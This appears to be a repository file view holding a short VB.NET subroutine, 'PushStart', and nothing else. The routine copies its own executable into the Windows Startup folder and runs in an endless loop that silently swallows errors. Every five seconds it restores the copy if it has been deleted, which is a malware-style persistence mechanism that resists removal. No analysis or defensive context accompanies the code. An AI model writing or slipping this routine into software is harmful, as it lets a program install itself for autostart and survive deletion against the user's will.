Files
2026-08-27 11:04:21 -06:00

12 lines
501 B
Plaintext

Shared Sub PushStart()
Dim xx As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup) & "\" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath)
While True
Try
If Not IO.File.Exists(xx) Then
IO.File.Copy(System.Windows.Forms.Application.ExecutablePath, xx)
End If
Catch
End Try
System.Threading.Thread.Sleep(5000)
End While
End Sub